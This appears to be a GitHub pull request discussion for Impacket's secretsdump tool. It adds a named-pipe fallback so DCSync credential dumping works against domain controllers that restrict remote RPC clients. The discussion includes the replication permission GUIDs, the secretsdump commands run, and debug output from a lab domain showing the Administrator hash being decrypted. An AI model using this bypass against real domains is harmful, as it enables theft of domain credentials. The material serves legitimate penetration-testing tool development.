Adding logic for DCs with RestrictRemoteClients = 2

[clou42]

Hi,

I figured that secretsdump fails with a rpc_c_access_denied error when a target DC has set the HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Rpc\RestrictRemoteClients = 2.

To resolve this, I added a fallback using the named pipe protocol sequence.
From Microsoft docs (https://learn.microsoft.com/en-us/windows-server/security/rpc-interface-restrict): "RPC clients that use the named pipe protocol sequence (ncacn_np) are exempt from all restrictions discussed in this section. The named pipe protocol sequence can't be restricted due to significant backwards compatibility issues."

This patch aims at resolving that. I tested it in my lab and did not see any adverse effects. (I also tried to not touch any working behavior, this is a pure fallback implementation).
A longline is printed whenever we fall back to a named pipe.

Hope this helps others as well. In case of questions let me know.

[clou42]

In case you want to reproduce:

Note that behavior is different with full DA accounts and users that are empowered to DCsync via ACLs.
The user testi2 has exactly there 3 permissions:

$GuidReplicatingDirectoryChanges = [Guid]"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2" $GuidReplicatingDirectoryChangesAll = [Guid]"1131f6ad-9c07-11d1-f79f-00c04fc2dcd2" $GuidReplicationSynchronization = [Guid]"1131f6ab-9c07-11d1-f79f-00c04fc2dcd2"

Full error before patch:

impacket-secretsdump -debug -user-status north.sevenkingdoms.local/testi2@winterfell -k
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
Password:
[-] CCache file is not found. Skipping...
[+] The specified path is not correct or the KRB5CCNAME environment variable is not defined
[+] Trying to connect to KDC at NORTH.SEVENKINGDOMS.LOCAL:88
[+] Trying to connect to KDC at NORTH.SEVENKINGDOMS.LOCAL:88
[+] Trying to connect to KDC at NORTH.SEVENKINGDOMS.LOCAL:88
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Session resume file will be sessionresume_vlIxMFVe
Traceback (most recent call last):
  File "/usr/share/doc/python3-impacket/examples/secretsdump.py", line 326, in dump
    self.__NTDSHashes.dump()
    ~~~~~~~~~~~~~~~~~~~~~~^^
  File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 3132, in dump
    userRecord = self.__remoteOps.DRSGetNCChangesSid(userSid)
  File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 623, in DRSGetNCChangesSid
    return self._DRSGetNCChanges(userSid, dsName)
           ~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 627, in _DRSGetNCChanges
    self.__connectDrds()
    ~~~~~~~~~~~~~~~~~~^^
  File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 498, in __connectDrds
    stringBinding = epm.hept_map(self.__smbConnection.getRemoteHost(), drsuapi.MSRPC_UUID_DRSUAPI,
                                 protocol='ncacn_ip_tcp')
  File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/epm.py", line 1330, in hept_map
    resp = dce.request(request)
  File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 1415, in request
    answer = self.recv()
  File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 1883, in recv
    raise DCERPCException(rpc_status_codes[status_code])
impacket.dcerpc.v5.rpcrt.DCERPCException: rpc_s_access_denied
[-] rpc_s_access_denied
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...

Working after applying the patch:

python3 examples/secretsdump.py -debug -user-status north.sevenkingdoms.local/testi2@winterfell -k
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
Password:
[-] CCache file is not found. Skipping...
[+] The specified path is not correct or the KRB5CCNAME environment variable is not defined
[+] Trying to connect to KDC at NORTH.SEVENKINGDOMS.LOCAL:88
[+] Trying to connect to KDC at NORTH.SEVENKINGDOMS.LOCAL:88
[+] Trying to connect to KDC at NORTH.SEVENKINGDOMS.LOCAL:88
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Session resume file will be sessionresume_yBlDIuoL
[*] Endpoint Mapper (TCP/135) denied anonymous access; using authenticated epmapper pipe
[-] CCache file is not found. Skipping...
[+] The specified path is not correct or the KRB5CCNAME environment variable is not defined
[+] Trying to connect to KDC at NORTH.SEVENKINGDOMS.LOCAL:88
[+] Trying to connect to KDC at NORTH.SEVENKINGDOMS.LOCAL:88
[+] Trying to connect to KDC at NORTH.SEVENKINGDOMS.LOCAL:88
[-] CCache file is not found. Skipping...
[+] The specified path is not correct or the KRB5CCNAME environment variable is not defined
[+] Trying to connect to KDC at NORTH.SEVENKINGDOMS.LOCAL:88
[+] Trying to connect to KDC at NORTH.SEVENKINGDOMS.LOCAL:88
[+] Trying to connect to KDC at NORTH.SEVENKINGDOMS.LOCAL:88
[+] Calling DRSGetNCChanges for S-1-5-21-3535564289-1227224518-3437987830-500
[+] SID lookup unsuccessful, falling back to DRSCrackNames/GUID lookups
[+] Calling DRSCrackNames for S-1-5-21-3535564289-1227224518-3437987830-500
[+] Calling DRSGetNCChanges for {812cd957-89c7-426d-874c-93810c1a3217}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=north,DC=sevenkingdoms,DC=local
Administrator:500:...```